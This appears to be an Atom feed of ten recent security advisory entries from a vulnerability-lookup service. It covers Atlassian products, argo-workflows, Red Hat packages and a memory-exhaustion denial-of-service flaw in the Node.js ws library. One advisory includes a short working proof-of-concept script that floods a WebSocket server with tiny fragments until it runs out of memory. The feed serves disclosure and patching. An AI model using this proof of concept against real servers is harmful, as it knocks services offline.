<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-02T19:36:48.044540+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2026-avi-0934</id>
    <title>certfr-2026-avi-0934 — De multiples vulnérabilités ont été découvertes dans les produits Atlassian. Certaines d'entre elles permettent à un at…</title>
    <updated>2026-10-02T19:36:48.562147+00:00</updated>
    <content>certfr-2026-avi-0934</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2026-avi-0934"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cleanstart-2026-eu00318</id>
    <title>Withdrawn: CLEANSTART-2026-EU00318 — Security fixes in argo-workflows 3.7.17-r1</title>
    <updated>2026-10-02T19:36:48.562230+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Withdrawn by the publisher.</strong></p>
<p><strong>Affected:</strong> CleanStart: argo-workflows</p>
<p>Package argo-workflows version 3.7.17-r1 fixes 16 vulnerabilities: ghsa-3ppc-4f35-3m26, ghsa-7r86-cg39-jmmj, ghsa-23c5-xmqv-rm74, ghsa-xv26-6w52-cph6, ghsa-q3j6-qgpj-74h6...</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cleanstart-2026-eu00318"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-366760</id>
    <title>EUVD-2026-366760</title>
    <updated>2026-10-02T19:36:48.562267+00:00</updated>
    <content>EUVD-2026-366760</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-366760"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-48779</id>
    <title>fkie_cve-2026-48779</title>
    <updated>2026-10-02T19:36:48.562281+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-48779"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-96hv-2xvq-fx4p</id>
    <title>GHSA-96hv-2xvq-fx4p — ws: Memory exhaustion DoS from tiny fragments and data chunks</title>
    <updated>2026-10-02T19:36:48.562305+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: ws</p>
<p>### Impact</p>
<p>A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.</p>
<p>### Proof of concept</p>
<p>```js
import { WebSocket, WebSocketServer } from 'ws';</p>
<p>const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);</p>
<p>ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });</p>
<p>ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});</p>
<p>wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});
```</p>
<p>### Patches</p>
<p>The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-96hv-2xvq-fx4p"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/msrc_cve-2026-48779</id>
    <title>msrc_CVE-2026-48779 — ws: Memory exhaustion DoS from tiny fragments and data chunks</title>
    <updated>2026-10-02T19:36:48.562353+00:00</updated>
    <content>msrc_CVE-2026-48779</content>
    <link href="https://cve.radiocsirt.org/vuln/msrc_cve-2026-48779"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ncsc-2026-0325</id>
    <title>NCSC-2026-0325 — Kwetsbaarheden verholpen in Atlassian producten</title>
    <updated>2026-10-02T19:36:48.562372+00:00</updated>
    <content>NCSC-2026-0325</content>
    <link href="https://cve.radiocsirt.org/vuln/ncsc-2026-0325"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2026:11123-1</id>
    <title>openSUSE-SU-2026:11123-1 — jupyter-nbclassic-1.3.3-2.1 on GA media</title>
    <updated>2026-10-02T19:36:48.562475+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>jupyter-nbclassic-1.3.3-2.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2026:11123-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:29197</id>
    <title>RHSA-2026:29197 — Red Hat Security Advisory: A Subscription Management tool for finding and reporting Red Hat product usage</title>
    <updated>2026-10-02T19:36:48.562492+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>rsync: rsync server leaks arbitrary client files glib: GLib: Buffer underflow in GVariant parser leads to heap corruption glib: Integer Overflow in GLib GIO Attribute Escaping Causes Heap Buffer Overflow gnutls: gnutls: Security bypass allows acceptance of revoked server certificates via crafted OCSP response gnutls: GnuTLS: Policy bypass due to case-sensitive nameConstraints comparison glibc: glibc: Denial of Service via iconv() function with specific character sets glibc: glibc: Incorrect DNS response parsing via crafted DNS server response glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions libcap: libcap: Privilege escalation via TOCTOU race condition in cap_set_file() gnutls: gnutls: Information disclosure via heap overread in RSA key exchange gnutls: gnutls: Information disclosure via timing side-channel in PKCS#7 padding removal fast-uri: fast-uri: URI authority bypass due to improper delimiter handling openssl: OpenSSL: Heap buffer overflow due to signed integer overflow in Unicode output sizing openssl: OpenSSL: Denial of Service due to heap out-of-bounds read in CMS password-based decryption shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators openssl: OpenSSL: Denial of Service due to NULL pointer dereference in CMS EnvelopedData processing rsync: TOCTOU symlink race condition allowing local privilege escalation in daemon mode without chroot. gnutls: GnuTLS: Denial of Service via DTLS zero-l…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:29197"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48779</id>
    <title>UBUNTU-CVE-2026-48779</title>
    <updated>2026-10-02T19:36:48.562601+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:16.04:LTS: node-ws, Ubuntu:18.04:LTS: node-ws, Ubuntu:20.04:LTS: node-ws, Ubuntu:22.04:LTS: node-ws, Ubuntu:24.04:LTS: node-ws, Ubuntu:25.10: node-ws, Ubuntu:26.04:LTS: node-ws</p>
<p>ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2026-48779"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2460</id>
    <title>WID-SEC-W-2026-2460 — Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management: Mehrere Schwachstellen</title>
    <updated>2026-10-02T19:36:48.562634+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira und Jira Service Management ausnutzen, um beliebigen Code auszuführen, erweiterte Berechtigungen zu erlangen, Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand auszulösen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2026-2460"/>
  </entry>
</feed>
